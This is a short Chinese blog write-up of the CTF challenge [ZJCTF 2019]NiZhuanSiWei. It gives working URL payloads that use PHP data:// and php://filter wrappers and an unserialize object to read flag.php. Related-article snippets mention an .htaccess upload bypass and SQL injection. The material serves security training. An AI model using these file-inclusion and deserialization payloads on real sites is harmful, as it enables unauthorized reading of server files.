[ZJCTF 2019]NiZhuanSiWei 1

最新推荐文章于 2024-07-16 13:49:15 发布
最新推荐文章于 2024-07-16 13:49:15 发布
阅读量58 收藏
点赞数
分类专栏: buuctf的wp 文章标签: php web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c1516175954/article/details/129120947
版权 
?text=data://text/plain,"welcome to the zjctf"
?text=data://text/plain,welcome to the zjctf&file=useless.php

没反应,尝试看源码

?text=data://text/plain,welcome to the zjctf&file=php://filter/convert.base64-encode/resource=useless.php

解码后:

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

__toString(),类被当成字符串时的回应方法

参考:PHP中 __toString()方法详解-php教程-PHP中文网

利用echo $password触发__toString读取并打印file参数(flag.php)

序列化:

<?php
class Flag{
    public $file = "flag.php";
}
$a = new Flag();
echo serialize($a);
?>

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

看源码

土木牛马勇闯天涯
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:[ZJCTF 2019]NiZhuanSiWei
末初的CSDN博客
11-05 1204
题目地址:https://buuoj.cn/challenges#[ZJCTF%202019]NiZhuanSiWei 老题目了 /?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.php POST内容 welcome to the zjctf useless.php <?php class Flag{ //flag.php public $file;.
CTF题记——BUU刷题
m0re's blog
08-16 1699
本文目录[护网杯 2018]easy_tornado[CISCN2019 华北赛区 Day2 Web1]Hack World [护网杯 2018]easy_tornado 三个文件,内容如下: /flag.txt /flag.txt flag in /fllllllllllllag /welcome.txt /welcome.txt render /hints.txt /hints.txt md5(cookie_secret+md5(filename)) 首先分析浏览了所有的信息。(源码也没什
BUUCTF百题刷题总结(一)
qwzf
09-14 2046
前言 最近打算开始刷BUU的Web题了,之前已经刷过一些,有的总结了,有的没有总结。总结过的这里只写之前总结的链接;没总结的,原因是当时感觉有点简单,这里简单写下考察知识点和解题思路。 新刷的Web题,会认真总结。本篇主要记录之前刷的题,BUUCTF刷题系列持续更新(SQL注入题单独记录)! 0x01 [HCTF 2018]WarmUp 考点:PHP代码审计+绕过自定义函数+文件包含 查看源代码,发现source.php,访问发现源码 <?php highlight_file(__FILE_
buu刷题 WEEK1
carol2358的博客
12-06 498
文章目录WEB [ZJCTF 2019]NiZhuanSiWeiREAL [ThinkPHP]5-Rce WEB [ZJCTF 2019]NiZhuanSiWei 三个参数 text,file,password,先看逻辑,要text和welcome to the zjctf相等,才能进入if,否则只是高亮本文件。 涉及到data伪协议 ?text=data:text/plain,welcome to the zjctf php://input ?file=php://filter/convert.bas
[ZJCTF 2019]NiZhuanSiWei1 详解
qq_63548648的博客
12-03 1744
1
BUUCTF [ZJCTF 2019]NiZhuanSiWei1
biggerpig的博客
09-25 960
BUUCTF web类型题目[ZJCTF 2019]NiZhuanSiWei1详解
[ZJCTF 2019]NiZhuanSiWei
m0_62709637的博客
10-13 218
反序列化,伪协议
BUUCTF [ZJCTF 2019]NiZhuanSiWei
m0_49025459的博客
05-02 546
进去就是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>&l
web | CTF】BUUCTF [ZJCTF 2019]NiZhuanSiWei
weixin_46301214的博客
09-30 154
利用:是php中独有的一个协议,可以作为一个中间过滤器来处理目标数据流,可以进行任意文件的读取,且该协议的参数会在该协议路径上进行传递,多个参数都可以在一个路径上传递,相当于可构造多个过滤器。通俗一点讲就是,php://input作为被包含的参数时,也是文件包含,不过是包含的对象是post的数据,而post的数据为用户所传入,所以也相当于任意命令执行。直接 file=flag.php ,然后echo一下实例化的类,就完事了(忘记了上去看一下一开始的源码)有不一样的效果,有的是在注释,有的是直接显示到页面。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ns3-gym入门(二):linear-mesh例子详解
zoe2222226666的博客
07-15 894
学习ns3-gym中关于IEEE 802.11网状网络中控制随机接入的例子linear-mesh
【框架】PHP框架详解-symfony框架
Xiaoxin的博客
07-16 827
1. 起源与开发者Symfony由SensioLabs(现为Symfony公司)开发,最初由Fabien Potencier于2005年创建。Symfony框架自发布以来,经历了多个版本的迭代,每个版本都引入了新的特性和改进,以满足不断变化的Web开发需求。2. 设计理念Symfony框架遵循MVC(Model-View-Controller)设计模式,将应用程序分为模型、视图和控制器三个核心部分,有助于实现代码的分离和重用。
喰星云·数字化餐饮服务系统 多处 SQL注入漏洞复现
0xSec
07-14 488
喰星云·数字化餐饮服务系统 not_out_depot.php、shelflife.php、not_finish.php、stock.php等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
深入探索Laravel框架中的Blade模板引擎
2402_85762143的博客
07-14 788
Blade是Laravel框架自带的模板引擎,它允许你使用纯PHP代码来编写HTML模板。Blade的语法非常简洁,它使用双大括号{{ }}来输出数据,使用三组大括号!!!来输出未转义的HTML内容,以及使用符号来定义控制结构,比如@foreach@if等。
简单Wordpress小工具开发
最新发布
地衣君的博客
07-16 1143
记录简单的wordpress小工具开发,以简单的格言打印为例。
昇思25天学习打卡营第15天|ResNet50迁移学习
ptyp222的博客
07-15 516
本章依然使用了ResNet50网络模型,完成了狼狗图片分类任务。
NSSCTF中24网安培训day1中web的题目
2302_78903258的博客
07-14 1064
我又试了大小写,双写,特殊后缀名绕过的方法,发现均不能绕过,我们用.htaccess文件进行绕过,先上传一个.htaccess文件,文件内容<FilesMatch ¡°.jpg¡±>SetHandler application/x-httpd-php</FilesMatch> //这是把php文件都当作jpg的图片格式。,也就是说它执行了下面这句,那么我们还需要传flag参数。giveme=flag&flag=giveme,输入后,发现如下直接返回了flag,也就是说,代码退出了并输出了flag。
PHP小课堂】学习PHP中的字符串操作函数(三)
硬核项目经理
07-15 781
学习PHP中的字符串操作函数(三)继续我们的 PHP 中字符串函数的学习之旅。今天我们要学习的内容是除了 str_ 和 str 开头之外的其它函数,这些函数也有很多非常好玩的内容,让我们赶快进入主题吧。分隔、打断字符串关于这个分割字符串并成为数组,或者是反过来的将数组组合成字符串的功能来说,implode() 和 explode() 这两个函数真的是出镜率非常的高。所以它们的使用也不用我多做介绍了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值